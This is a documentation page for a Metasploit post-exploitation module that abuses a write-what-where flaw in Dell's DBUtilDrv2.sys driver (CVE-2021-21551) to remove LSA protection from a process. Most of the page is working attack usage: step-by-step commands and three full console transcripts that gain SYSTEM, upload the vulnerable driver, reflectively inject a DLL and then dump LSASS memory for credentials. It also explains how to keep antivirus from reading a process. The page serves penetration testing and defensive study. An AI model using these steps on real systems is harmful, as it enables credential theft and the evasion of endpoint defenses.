Dell DBUtilDrv2.sys Memory Protection Modifier - Metasploit


This page contains detailed information about how to use the post/windows/manage/dell_memory_protect metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: Dell DBUtilDrv2.sys Memory Protection Modifier
Module: post/windows/manage/dell_memory_protect
Source code: modules/post/windows/manage/dell_memory_protect.rb
Disclosure date: -
Last modification time: 2021-12-18 10:56:46 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2021-21551

The Dell DBUtilDrv2.sys drivers version 2.5 and 2.7 have a write-what-where condition that allows an attacker to read and write arbitrary kernel-mode memory. This module installs the provided driver, enables or disables LSA protection on the provided PID, and then removes the driver. This would allow, for example, dumping LSASS memory even when secureboot is enabled or preventing antivirus from accessing the memory of a chosen PID. The affected drivers are not distributed with Metasploit. You will truly need to Bring Your Own (Dell) Driver.

Module Ranking and Traits

Module Ranking:

  • manual: The exploit is unstable or difficult to exploit and is basically a DoS. This ranking is also used when the module has no use unless specifically configured by the user (e.g.: exploit/windows/smb/psexec). More information about ranking can be found here.

Stability:

  • crash-os-restarts: Module may crash the OS, but the OS restarts.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
  • artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.

Basic Usage

There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/manage/dell_memory_protect

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/manage/dell_memory_protect
msf post(dell_memory_protect) > show options
    ... show and set options ...
msf post(dell_memory_protect) > set SESSION session-id
msf post(dell_memory_protect) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/manage/dell_memory_protect")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options

  • SESSION: The session to run this module on

Knowledge Base

Vulnerable Application

The Dell driver dbutil_2_3.sys was affected by a local privilege escalation issue due to a write-what-where condition exposed by a few of the driver's IOCTLs. This was assigned CVE-2021-21551. Dell "fixed" this issue by deprecating dbutil_2_3.sys and switching to DBUtilDrv2.sys. The new driver prevent low privileged users from interacting with the driver but did not fix the write-what-where condition.

This module leverages the write-what-where condition in DBUtilDrv2.sys version 2.5 or 2.7 to disable or enable LSA protect on a given PID (assuming the system is configured for LSA Protection). This would allow, for example, dumping LSASS memory even when Secure Boot and RunAsPPL are enabled. Or, as another example, allow an attacker to prevent antivirus from accessing the memory of a chosen process.

The Dell drivers are not distributed with Metasploit. The user must truly BYOVD and upload the driver and installation files to the target system themselves. The module will install, exploit, and remove the driver. Both installing the driver and dumping memory require high privileged accounts. The following is the required files per version and their hashes:

dbutildrv2.sys version 2.5

dbutildrv2.sys version 2.7

See scenarios below for an example.

Supported Targets

  • Windows 10 x64 v1507 - v19044 (21H2)
  • Windows 11 x64 21H2
  • Windows Server 2016 x64 v1607 - v1709
  • Windows Server 2019 x64 v1909 - v2009 (20H2)

The targets must have UEFI or Secure Boot enabled and the RunAsPPL registry key should be configured.

Options

DRIVER_PATH

The path on the RHOST containing the driver inf, cat, and sys (and coinstaller depending on the version). For example, in the scenarios below, the driver files are uploaded to C:\Windows\Temp, so this should be set DRIVER_PATH C:\\Windows\\Temp.

ENABLE_MEM_PROTECT

Enable or disable memory protection on the targetted process. false will remove memory protection and true will enable it.

PID

The ID of the targetted process. If set to 0 (the default value), the module will automatically find lsass.exe.

Verification Steps

  1. Start msfconsole
  2. Get a system Meterpreter session on a host using UEFI or Secure Boot and configured with RunAsPPL.
  3. Obtain the pid of lsass.exe: ps | grep lsass
  4. Background the session
  5. Do: post/windows/gather/memory_dump
  6. Set the SESSION, PID, and DUMP_PATH options.
  7. Do: run
  8. Observe a permission denied error.
  9. Return to the previous session: sessions -i 1
  10. Upload the required driver files: upload /home/albinolobster/drivers/2_7/ C:\\Windows\\Temp\\
  11. Background the session
  12. Do: use post/windows/manage/dell_memory_protect
  13. Set the SESSION, PID, and DRIVER_PATH (e.g. C:\\Windows\\Temp) options.
  14. Do: run
  15. Observe the module exits successfully.
  16. Do: post/windows/gather/memory_dump
  17. Do: run
  18. Observe the successful memory dump of lsass

Scenarios

Windows 11 Build 22000.348 x64 using DBUtilDrv2 version 2.7

[*] Started reverse TCP handler on 10.0.0.9:1270 
[*] Meterpreter session 1 opened (10.0.0.9:1270 -> 10.0.0.8:47730 ) at 2021-12-07 12:48:57 -0800

meterpreter > sysinfo
Computer        : BADBLOOD
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: badblood\albinolobster
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > ps | grep lsass
Filtering on 'lsass'

Process List
============

 PID  PPID  Name       Arch  Session  User  Path
 ---  ----  ----       ----  -------  ----  ----
 740  572   lsass.exe  x64   0

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/windows/gather/memory_dump
msf6 post(windows/gather/memory_dump) > options

Module options (post/windows/gather/memory_dump):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DUMP_PATH                   yes       File to write memory dump to
   DUMP_TYPE  standard         yes       Minidump size (Accepted: standard, full)
   PID                         yes       ID of the process to dump memory from
   SESSION                     yes       The session to run this module on

msf6 post(windows/gather/memory_dump) > set SESSION 1
SESSION => 1
msf6 post(windows/gather/memory_dump) > set PID 740
PID => 740
msf6 post(windows/gather/memory_dump) > set DUMP_PATH C:\\Windows\\Temp\\lsass_dump
DUMP_PATH => C:\Windows\Temp\lsass_dump
msf6 post(windows/gather/memory_dump) > run

[*] Running module against BADBLOOD
[*] Dumping memory for lsass.exe
[-] Post aborted due to failure: payload-failed: Unable to open process: Access is denied.
[*] Post module execution completed
msf6 post(windows/gather/memory_dump) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > upload /home/albinolobster/drivers/2_7/ C:\\Windows\\Temp
[*] uploading  : /home/albinolobster/drivers/2_7/WdfCoInstaller01009.dll -> C:\Windows\Temp\WdfCoInstaller01009.dll
[*] uploaded   : /home/albinolobster/drivers/2_7/WdfCoInstaller01009.dll -> C:\Windows\Temp\WdfCoInstaller01009.dll
[*] uploading  : /home/albinolobster/drivers/2_7/DBUtilDrv2.cat -> C:\Windows\Temp\DBUtilDrv2.cat
[*] uploaded   : /home/albinolobster/drivers/2_7/DBUtilDrv2.cat -> C:\Windows\Temp\DBUtilDrv2.cat
[*] uploading  : /home/albinolobster/drivers/2_7/dbutildrv2.inf -> C:\Windows\Temp\dbutildrv2.inf
[*] uploaded   : /home/albinolobster/drivers/2_7/dbutildrv2.inf -> C:\Windows\Temp\dbutildrv2.inf
[*] uploading  : /home/albinolobster/drivers/2_7/DBUtilDrv2.sys -> C:\Windows\Temp\DBUtilDrv2.sys
[*] uploaded   : /home/albinolobster/drivers/2_7/DBUtilDrv2.sys -> C:\Windows\Temp\DBUtilDrv2.sys
meterpreter > background
[*] Backgrounding session 1...
msf6 post(windows/gather/memory_dump) > use post/windows/manage/dell_memory_protect 
msf6 post(windows/manage/dell_memory_protect) > options

Module options (post/windows/manage/dell_memory_protect):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   DRIVER_PATH                          yes       The path containing the driver inf, cat, and sys (and coinstaller)
   ENABLE_MEM_PROTECT  false            yes       Enable or disable memory protection
   PID                                  yes       The targetted process
   SESSION                              yes       The session to run this module on

msf6 post(windows/manage/dell_memory_protect) > set SESSION 1
SESSION => 1
msf6 post(windows/manage/dell_memory_protect) > set DRIVER_PATH C:\\Windows\\Temp
DRIVER_PATH => C:\Windows\Temp
msf6 post(windows/manage/dell_memory_protect) > set PID 740
PID => 740
msf6 post(windows/manage/dell_memory_protect) > run

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Launching netsh to host the DLL...
[+] Process 692 launched.
[*] Reflectively injecting the DLL into 692...
[+] Exploit finished
[*] Post module execution completed
msf6 post(windows/manage/dell_memory_protect) > use post/windows/gather/memory_dump 
msf6 post(windows/gather/memory_dump) > options

Module options (post/windows/gather/memory_dump):

   Name       Current Setting             Required  Description
   ----       ---------------             --------  -----------
   DUMP_PATH  C:\Windows\Temp\lsass_dump  yes       File to write memory dump to
   DUMP_TYPE  standard                    yes       Minidump size (Accepted: standard, full)
   PID        740                         yes       ID of the process to dump memory from
   SESSION    1                           yes       The session to run this module on

msf6 post(windows/gather/memory_dump) > run

[*] Running module against BADBLOOD
[*] Dumping memory for lsass.exe
[*] Downloading minidump (4.11 MiB)
[+] Memory dump stored at /home/albinolobster/.msf4/loot/20211207125102_default_172.16.144.11_windows.process._368616.bin
[*] Deleting minidump from disk
[*] Post module execution completed
msf6 post(windows/gather/memory_dump) >

Windows 10 Build 19044.1348 x64 using DBUtilDrv2 version 2.5

[*] Started reverse TCP handler on 10.0.0.9:1270 
[*] Meterpreter session 1 opened (10.0.0.9:1270 -> 10.0.0.8:39523 ) at 2021-12-08 07:18:27 -0800

meterpreter > sysinfo
Computer        : DESKTOP-JCD6JN8
OS              : Windows 10 (10.0 Build 19044).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-JCD6JN8\albinolobster
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > ps | grep lsass
Filtering on 'lsass'

Process List
============

 PID  PPID  Name       Arch  Session  User  Path
 ---  ----  ----       ----  -------  ----  ----
 732  568   lsass.exe  x64   0

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/windows/gather/memory_dump
msf6 post(windows/gather/memory_dump) > set SESSION 1
SESSION => 1
msf6 post(windows/gather/memory_dump) > set PID 732
PID => 732
msf6 post(windows/gather/memory_dump) > set DUMP_PATH C:\\Windows\\Temp\\lsass_dump
DUMP_PATH => C:\Windows\Temp\lsass_dump
msf6 post(windows/gather/memory_dump) > run

[*] Running module against DESKTOP-JCD6JN8
[*] Dumping memory for lsass.exe
[-] Post aborted due to failure: payload-failed: Unable to open process: Access is denied.
[*] Post module execution completed
msf6 post(windows/gather/memory_dump) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > upload /home/albinolobster/drivers/2_5/ C:\\Windows\\Temp\\
[*] uploading  : /home/albinolobster/drivers/2_5/DBUtilDrv2.cat -> C:\Windows\Temp\\DBUtilDrv2.cat
[*] uploaded   : /home/albinolobster/drivers/2_5/DBUtilDrv2.cat -> C:\Windows\Temp\\DBUtilDrv2.cat
[*] uploading  : /home/albinolobster/drivers/2_5/dbutildrv2.inf -> C:\Windows\Temp\\dbutildrv2.inf
[*] uploaded   : /home/albinolobster/drivers/2_5/dbutildrv2.inf -> C:\Windows\Temp\\dbutildrv2.inf
[*] uploading  : /home/albinolobster/drivers/2_5/DBUtilDrv2.sys -> C:\Windows\Temp\\DBUtilDrv2.sys
[*] uploaded   : /home/albinolobster/drivers/2_5/DBUtilDrv2.sys -> C:\Windows\Temp\\DBUtilDrv2.sys
meterpreter > background
[*] Backgrounding session 1...
msf6 post(windows/gather/memory_dump) > use post/windows/manage/dell_memory_protect 
msf6 post(windows/manage/dell_memory_protect) > set SESSION 1
SESSION => 1
msf6 post(windows/manage/dell_memory_protect) > set DRIVER_PATH C:\\Windows\\Temp\\
DRIVER_PATH => C:\Windows\Temp\
msf6 post(windows/manage/dell_memory_protect) > set PID 732
PID => 732
msf6 post(windows/manage/dell_memory_protect) > run

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Launching netsh to host the DLL...
[+] Process 3508 launched.
[*] Reflectively injecting the DLL into 3508...
[+] Exploit finished
[*] Post module execution completed
msf6 post(windows/manage/dell_memory_protect) > use post/windows/gather/memory_dump 
msf6 post(windows/gather/memory_dump) > run

[*] Running module against DESKTOP-JCD6JN8
[*] Dumping memory for lsass.exe
[*] Downloading minidump (5.93 MiB)
[+] Memory dump stored at /home/albinolobster/.msf4/loot/20211208072121_default_172.16.144.6_windows.process._495675.bin
[*] Deleting minidump from disk
[*] Post module execution completed
msf6 post(windows/gather/memory_dump) >

Windows Server 2016 (10.0.14393) x64 using DBUtilDrv2 version 2.5 and PID option set to 0

[*] Started reverse TCP handler on 10.0.0.3:4444 
[*] Meterpreter session 1 opened (10.0.0.3:4444 -> 10.0.0.8:45172 ) at 2021-12-18 04:12:03 -0800

meterpreter > sysinfo
Computer        : WIN-7ESIGFVFQEG
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN-7ESIGFVFQEG\albinolobster
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > ps | grep lsass
Filtering on 'lsass'

Process List
============

 PID  PPID  Name       Arch  Session  User  Path
 ---  ----  ----       ----  -------  ----  ----
 664  504   lsass.exe  x64   0

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use post/windows/gather/memory_dump
msf6 post(windows/gather/memory_dump) > set SESSIOn 1
SESSIOn => 1
msf6 post(windows/gather/memory_dump) > set PID 664
PID => 664
msf6 post(windows/gather/memory_dump) > set DUMP_PATH C:\\Windows\\Temp\\lsass_dump
DUMP_PATH => C:\Windows\Temp\lsass_dump
msf6 post(windows/gather/memory_dump) > run

[*] Running module against WIN-7ESIGFVFQEG
[*] Dumping memory for lsass.exe
[-] Post aborted due to failure: payload-failed: Unable to open process: Access is denied.
[*] Post module execution completed
msf6 post(windows/gather/memory_dump) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > upload /home/albinolobster/drivers/2_5/ C:\\Windows\\Temp\\
[*] uploading  : /home/albinolobster/drivers/2_5/DBUtilDrv2.cat -> C:\Windows\Temp\\DBUtilDrv2.cat
[*] uploaded   : /home/albinolobster/drivers/2_5/DBUtilDrv2.cat -> C:\Windows\Temp\\DBUtilDrv2.cat
[*] uploading  : /home/albinolobster/drivers/2_5/dbutildrv2.inf -> C:\Windows\Temp\\dbutildrv2.inf
[*] uploaded   : /home/albinolobster/drivers/2_5/dbutildrv2.inf -> C:\Windows\Temp\\dbutildrv2.inf
[*] uploading  : /home/albinolobster/drivers/2_5/DBUtilDrv2.sys -> C:\Windows\Temp\\DBUtilDrv2.sys
[*] uploaded   : /home/albinolobster/drivers/2_5/DBUtilDrv2.sys -> C:\Windows\Temp\\DBUtilDrv2.sys
meterpreter > background
[*] Backgrounding session 1...
msf6 post(windows/gather/memory_dump) > use post/windows/manage/dell_memory_protect
msf6 post(windows/manage/dell_memory_protect) > set DRIVER_PATH C:\\Windows\\Temp\\
DRIVER_PATH => C:\Windows\Temp\
msf6 post(windows/manage/dell_memory_protect) > set SESSION 1
SESSION => 1
msf6 post(windows/manage/dell_memory_protect) > run

[*] Set PID option 664 for lsass.exe
[*] Launching netsh to host the DLL...
[+] Process 3008 launched.
[*] Reflectively injecting the DLL into 3008...
[+] Exploit finished
[*] Post module execution completed
msf6 post(windows/manage/dell_memory_protect) > use post/windows/gather/memory_dump
msf6 post(windows/gather/memory_dump) > run

[*] Running module against WIN-7ESIGFVFQEG
[*] Dumping memory for lsass.exe
[*] Downloading minidump (4.70 MiB)
[+] Memory dump stored at /home/albinolobster/.msf4/loot/20211218041511_default_172.16.144.14_windows.process._536152.bin
[*] Deleting minidump from disk
[*] Post module execution completed
msf6 post(windows/gather/memory_dump) >

Go back to menu.

Msfconsole Usage

Here is how the windows/manage/dell_memory_protect post exploitation module looks in the msfconsole:


msf6 > use post/windows/manage/dell_memory_protect
msf6 post(windows/manage/dell_memory_protect) > show info
       Name: Dell DBUtilDrv2.sys Memory Protection Modifier
     Module: post/windows/manage/dell_memory_protect
   Platform: Windows
       Arch: 
       Rank: Manual

Provided by:
  SentinelLabs
  Kasif Dekel
  Red Cursor
  Jacob Baines

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-os-restarts

Compatible session types:
  Meterpreter

Basic options:
  Name                Current Setting  Required  Description
  ----                ---------------  --------  -----------
  DRIVER_PATH                          yes       The path containing the driver inf, cat, and sys (and coinstaller)
  ENABLE_MEM_PROTECT  false            yes       Enable or disable memory protection
  PID                 0                yes       The targetted process. If set to 0 the module will automatically target lsass.exe
  SESSION                              yes       The session to run this module on

Description:
  The Dell DBUtilDrv2.sys drivers version 2.5 and 2.7 have a 
  write-what-where condition that allows an attacker to read and write 
  arbitrary kernel-mode memory. This module installs the provided 
  driver, enables or disables LSA protection on the provided PID, and 
  then removes the driver. This would allow, for example, dumping 
  LSASS memory even when secureboot is enabled or preventing antivirus 
  from accessing the memory of a chosen PID. The affected drivers are 
  not distributed with Metasploit. You will truly need to Bring Your 
  Own (Dell) Driver.

References:
  https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/
  https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection
  https://itm4n.github.io/lsass-runasppl/
  https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/
  https://attackerkb.com/assessments/12d7b263-3684-4442-812e-dc30b93def93
  https://github.com/RedCursorSecurityConsulting/PPLKiller
  https://github.com/jbaines-r7/dellicious

Module Options

This is a complete list of options available in the windows/manage/dell_memory_protect post exploitation module:


msf6 post(windows/manage/dell_memory_protect) > show options

Module options (post/windows/manage/dell_memory_protect):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   DRIVER_PATH                          yes       The path containing the driver inf, cat, and sys (and coinstaller)
   ENABLE_MEM_PROTECT  false            yes       Enable or disable memory protection
   PID                 0                yes       The targetted process. If set to 0 the module will automatically target lsass.exe
   SESSION                              yes       The session to run this module on

Advanced Options

Here is a complete list of advanced options supported by the windows/manage/dell_memory_protect post exploitation module:


msf6 post(windows/manage/dell_memory_protect) > show advanced

Module advanced options (post/windows/manage/dell_memory_protect):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions

This is a list of all post exploitation actions which the windows/manage/dell_memory_protect module can do:


msf6 post(windows/manage/dell_memory_protect) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options

Here is the full list of possible evasion options supported by the windows/manage/dell_memory_protect post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):


msf6 post(windows/manage/dell_memory_protect) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages

This module may fail with the following error messages:

Error Messages

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Target is not Windows. Found <SYSINFO_VALUE>

Here is a relevant code snippet related to the "Target is not Windows. Found <SYSINFO_VALUE>" error message:

62:	  end
63:	
64:	  def get_eproc_offsets
65:	    sysinfo_value = sysinfo['OS']
66:	    unless sysinfo_value =~ /Windows/
67:	      print_status("Target is not Windows. Found #{sysinfo_value}")
68:	      return nil
69:	    end
70:	
71:	    build_num = sysinfo_value.match(/Build (\d+)/)[1].to_i
72:	    vprint_status("Windows Build Number = #{build_num}")

Elevated session is required

Here is a relevant code snippet related to the "Elevated session is required" error message:

97:	    return offsets[build_num]
98:	  end
99:	
100:	  def run
101:	    unless is_system?
102:	      fail_with(Failure::None, 'Elevated session is required')
103:	    end
104:	
105:	    offsets = get_eproc_offsets
106:	    if offsets.nil?
107:	      fail_with(Failure::NoTarget, 'Unsupported targeted')

Unsupported targeted

Here is a relevant code snippet related to the "Unsupported targeted" error message:

102:	      fail_with(Failure::None, 'Elevated session is required')
103:	    end
104:	
105:	    offsets = get_eproc_offsets
106:	    if offsets.nil?
107:	      fail_with(Failure::NoTarget, 'Unsupported targeted')
108:	    end
109:	
110:	    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
111:	      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
112:	    end

Running against WOW64 is not supported

Here is a relevant code snippet related to the "Running against WOW64 is not supported" error message:

106:	    if offsets.nil?
107:	      fail_with(Failure::NoTarget, 'Unsupported targeted')
108:	    end
109:	
110:	    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
111:	      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
112:	    end
113:	
114:	    unless datastore['DRIVER_PATH'].include? '\\'
115:	      fail_with(Failure::BadConfig, "The driver path must be a file path. User provided: #{datastore['DRIVER_PATH']}")
116:	    end

The driver path must be a file path. User provided: <DRIVER_PATH>

Here is a relevant code snippet related to the "The driver path must be a file path. User provided: <DRIVER_PATH>" error message:

110:	    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
111:	      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
112:	    end
113:	
114:	    unless datastore['DRIVER_PATH'].include? '\\'
115:	      fail_with(Failure::BadConfig, "The driver path must be a file path. User provided: #{datastore['DRIVER_PATH']}")
116:	    end
117:	
118:	    # If the user doesn't select a PID select lsass.exe for them
119:	    target_pid = datastore['PID']
120:	    if target_pid == 0

Go back to menu.

References

See Also

Check also the following modules related to this module:

Related Nessus plugins:

Authors

  • SentinelLabs
  • Kasif Dekel
  • Red Cursor
  • Jacob Baines

Version

This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.